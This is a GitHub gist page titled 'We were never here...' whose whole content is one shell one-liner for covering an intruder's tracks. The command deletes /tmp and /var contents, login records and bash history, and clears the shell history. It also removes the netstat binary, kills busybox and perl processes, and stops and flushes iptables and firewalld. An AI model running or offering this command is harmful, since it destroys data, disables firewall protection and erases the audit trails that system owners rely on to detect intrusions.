Created
July 16, 2019 20:39
-
-
Save colehocking/330545654f2928bd9475b3d576fba9b6 to your computer and use it in GitHub Desktop.
We were never here...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop; | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment